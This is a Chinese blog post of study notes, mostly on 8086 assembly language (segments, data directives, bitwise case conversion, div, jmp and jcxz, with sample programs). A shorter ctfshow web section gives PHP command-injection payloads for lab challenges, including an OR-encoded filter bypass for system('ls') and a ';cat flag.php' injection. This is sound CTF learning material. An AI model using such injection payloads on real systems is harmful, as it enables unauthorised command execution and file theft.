汇编语言(续)buuctf pwn ctfshow web

最新推荐文章于 2024-07-21 13:14:27 发布
最新推荐文章于 2024-07-21 13:14:27 发布
阅读量92 收藏
点赞数
文章标签: 网络安全 web 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74228275/article/details/131527788
版权

目录

含多个段的程序

将数据,代码,段放入不同段中

and 和 or 指令

db指令

 大小写字母转换

SI和DI

div指令

伪指令dd

 dup

 转移指令

操作符offset

 jmp指令

jcxz指令

buuctf pwn

test_your_nc

reverse3

ctfshow web 入门

web 41

web42

web 43

web 44

web 45

web 46

assume cs:codesg
codesg segment
    mov ax,020h
    mov ds,ax
    mov ax,0ffffh
    mov es,ax
    mov bx,0
        mov cx,12
      s:mov dl,es:[bx]
    mov [bx],dl
    inc bx
    loop s

    mov ax,4c00h
    int 21h

codesg ends
end

上面是编写的一段汇编源代码

含多个段的程序

assume cs:codesg

codesg segment

        dw 0123h,0234h,0456h,0567h

        mov bx,0    ...............................(1)

        mov ax,0

        mov cx,4

      s:add ax,cs:[bx]

        add bx,2

        loop s

        mov ax,4c00h

        int 21h

codesg ends

end

dw和意思是“define word”,定义字型数据,用dw定义的数据位于代码段的最开始,从cs中可以得到他们的段地址,起始偏移地址为0,后来每次加2。

在(1)的前方加上start:可以指定程序编译时的第一条指令从此处开始(因为此时以cs为段地址的前8条指令用来定义字型数据),最后还要在end后加start

将数据,代码,段放入不同段中

assume cs:code,ds:data,ss:stack

data segment

        dw 0123h,0234h,0789h,0defh,0123h,0456h,0234h,0478h

data ends

stack segment

        dw 0,0,0,0,0,0,,0,0,0,0,0,0,0,0,0,,0

stack ends

code segment

start: mov ax,stack

        mov ss,ax

        mov sp,20h    //设置栈顶

        mov ax,data

        mov ds,ax

        mov bx,0

        mov cx,8

      s:push [bx]

        add bx,2

        loop s

        mov bx,0

        mov cx,8

     s1:pop [bx]

        add bx,2

        loop s1

        mov ax,4c00h

        int 21h

code ends

end start

指令mov ax,code的含义就是将data的段地址送入ax中

and 和 or 指令

and:按位与运算

or:按位或运算

db指令

DB作为汇编语言中的伪操作命令,它用来定义操作数占用的字节数(段地址为ss)

assume cs:code,ds:data

data segment

        db 'xyzs'

        db 'abcd'

data ends

code segment

start:mov ax,'a'

        mov bl,'b'

        mov ax,4c00h

        int 21h

code ends

end start

链接运行后

 大小写字母转换

可以让大写字母+20h=小写字母,但是这样需要一个判断

仔细观察小写字母和大写字母ascii码的二进制形式,发现因为小写字母比大写字母大20h,所以二进制第五位小写字母为1,大写字母为0。

assume cs:code,ds:data

data segment

        db 'xyzs'

        db 'abcd'

data ends

code segment

start:mov ax,data

        mov ds,ax

        mov bx,0

        mov cx,4

      s:mov al,[bx]

        and al,11011111B

        mov [bx],al

        inc bx

        loop s

        mov bx,4

        mov cx,4

     s1:mov al,[bx]

        or al,00100000B

        mov [bx],al

        inc bx

        loop s1

        mov ax,4c00h

        int 21h

code ends

end start

0[bx]: [bx+0]

SI和DI

si和di是8086CPU中和bx功能相近的寄存器,不能分为两个8位寄存器来使用

 在8086CPU中,只有bx,si,di,bp这四个寄存器可以用在[...]中进行内存单元的寻址

这四种寄存器可以单个出现,或者只能以四种组合形式出现:bx和si,bx和di,bp和si,bp和di。

若使用了寄存器bp,没有指定段地址,默认为ss

用(word|byte)ptr指明内存单元的长度

mov word ptr ds:[0],1

mov byte ptr ds:[0],1

 [bx].10h[si]:[bx+idata+si]

div指令

div  byte ptr ds:[0]

(al) = (ax) / ((ds) * 16 + 0)的商

(ah) = (ax) / ((ds) * 16 + 0)的余数

div word ptr es:[0]

(ax) = ((dx)*10000H+(ax)) / ((es)*16 + 0)的商

(dx) = ((dx)*10000H+(ax)) / ((es)*16 + 0)的余数

伪指令dd

dd指令用来定义双字型数据的

dd 1 //占两个字

 dup

和db, dw, dd等指令配合使用

 转移指令

修改ip或同时修改cs和ip的指令

操作符offset

它的功能是取得标号的偏移地址

start: mov ax,offset start    //offset start相当于0

s: mov ax,offset s                //offset start相当于3

 jmp指令

前面我们了解到jmp 可以用来修改ip,也可以同时修改cs和ip

jmp short 标号:转到标号处执行指令,实现的是段内短转移,对ip的修改范围为:-128~127

jmp near ptr 标号实现的是段内近转移,修改范围为:-32768~32767

jmp far ptr 标号实现的是段间转移

jmp word ptr 内存单元地址(段内转移)

mov ax,0123H

mov ds:[0],ax

jmp word ptr ds:[0]  ;执行后,ip=0123H

jmp dword ptr 内存单元地址(段间转移)

jcxz指令

jcxz指令时段转移。

jcxz 标号:若cx=0,转移到标号处执行,cx<>0,则程序继续向下执行

buuctf pwn

test_your_nc

reverse3

 

ctfshow web 入门

web 41

参考这篇文章

因为文中没有过滤‘|’,所以可以考虑用两个字符或组成所需要的字符

?c=system("ls");

?c=system("cat ")

运行上述文章中的php代码,可得如下

则system("ls");等价于("%60%60%60%60%60%60"|"%13%19%13%14%05%0d")("%60%60"|"%0c%13")

web42

>/dev/null 2>&1

?c=ls;

?c=cat flag.php;

查看源代码可得

web 43

web 44

web 45

web 46

Serendipity~~~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 1143
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1531
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
CTF-PWN学习-为缺少指导的同学而生_ctf pwn
2401_84253894的博客
06-24 977
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
Pwn学习路线及学习笔记以及gem安装
10-15
汇编语言》是Pwn学习的必备知识之一。作者建议从王爽老师的《汇编语言》开始,通过学习汇编语言来了解计算机内部的运行机理。汇编语言可以使大家更加深入地了解计算机内部到底是怎样运行的,并且可以学习到很多有...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
程序的机器级表示(一)汇编汇编格式和数据传输指令
h_17702564256的博客
07-18 1222
程序的机器级表示,两种汇编格式,寄存器的分类,传输指令及其细节
Keil C51 8051汇编函数参数和返回值放在哪里,C语言调用汇编函数时汇编函数如何处理参数?
qq582880551的博客
07-21 440
Keil C51 C语言中调用汇编函数时,最多使用三个参数,默认第一个参数从R7开始放,第二个参数从R5开始放,第三个参数从R3开始放,如果是2字节的int,那么遵循8051的大端模式,高字节放在R2、R4、R6,低字节放在R3、R5、R7;汇编函数将返回值返回给C语言时,返回值需要放在R7开始的位置,char就放在R7,int是0xR6R7,long和float是0xR4R5R6R7,指针是类型在R3,指针值0xR2R1;汇编里的函数如果要给C语言用,那么函数名(标号)前要叫下划线,例如。
汇编教程1
qq_64727229的博客
07-17 462
安装vscode+插件为后汇编实验做准备
基于微信小程序的高校体育互动平台设计与实现
07-21
在当前移动互联网技术广泛渗透各行业的背景下,高校体育教育面临着新的发展机遇和挑战。本研究以满足学生多样化体育需求、促进高校体育信息化管理为目标,探索了利用微信小程序等现代技术的体育互动平台设计与实施。通过深入文献回顾和定性、定量研究方法,全面了解了高校学生的体育需求及现有技术解决方案。在微信小程序技术支持下,设计了功能全面、用户友好、安全性高的平台,并多次迭代优化。实际应用和评估显示,该平台为学生提供了信息发布、活动报名、成绩查询和互动交流等综合体育活动管理服务。数据分析表明,相较传统管理方式,平台显著提升了学生体育活动参与度,增强了锻炼意识,同时为教育工作者提供了高效便捷的管理工具。基于微信小程序的高校体育互动平台为体育教育带来新的研究方向和实践机遇,不仅满足学生需求,还为教育工作者提供了灵活、有效的管理工具。 建议高校体育部门深入合作,结合国家政策推广完善该平台,提供培训和技术支持,确保其广泛应用和推广。
机器学习Python实战-重庆理工大学编著 教学ppt
最新发布
07-21
机器学习Python实战-重庆理工大学编著 全6章教学ppt(500+页)
软件杯 基于bert4keras与T5进行标题生成模型的训练与微调,对模型进行Quantize,并使用ONNX部署模型.zip
07-21
中国软件杯 全国二等奖基于 bert4keras 与 T5-pegasus 进行标题生成模型的训练与微调,对模型进行 Quantize,并使用 ONNX 部署模型,部署后服务请求时长约 0.6220 秒(Ubuntu 20 & 8 核 CPU) 【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
java毕设&课设-asp小型企业网上订单系统的设计与实现(源代码+论文).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
气动控制基本资料,考生考点汇总
07-21
气动控制基本资料,考生考点汇总
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值